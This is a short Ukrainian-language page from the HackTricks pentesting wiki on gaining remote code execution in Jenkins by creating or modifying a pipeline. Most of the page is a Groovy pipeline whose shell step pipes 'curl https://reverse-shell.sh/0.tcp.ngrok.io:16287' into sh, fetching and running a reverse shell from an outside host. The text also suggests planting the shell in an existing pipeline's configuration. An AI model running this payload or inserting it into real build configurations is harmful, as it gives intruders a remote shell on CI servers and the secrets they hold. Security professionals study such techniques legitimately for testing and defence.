Jenkins RCE Створення/Модифікація Пайплайну

Reading time: 2 minutes

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks

Створення нового Пайплайну

У "Новий елемент" (доступний за адресою /view/all/newJob) виберіть Пайплайн:

У розділі Пайплайн напишіть реверсну оболонку:

groovy
pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Нарешті натисніть Зберегти, а потім Запустити зараз, і конвеєр буде виконано:

Модифікація конвеєра

Якщо ви можете отримати доступ до файлу конфігурації деякого налаштованого конвеєра, ви можете просто модифікувати його, додавши ваш зворотний шелл, а потім виконати його або дочекатися, поки він буде виконаний.

tip

Вивчайте та практикуйте AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Вивчайте та практикуйте GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Вивчайте та практикуйте Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Підтримка HackTricks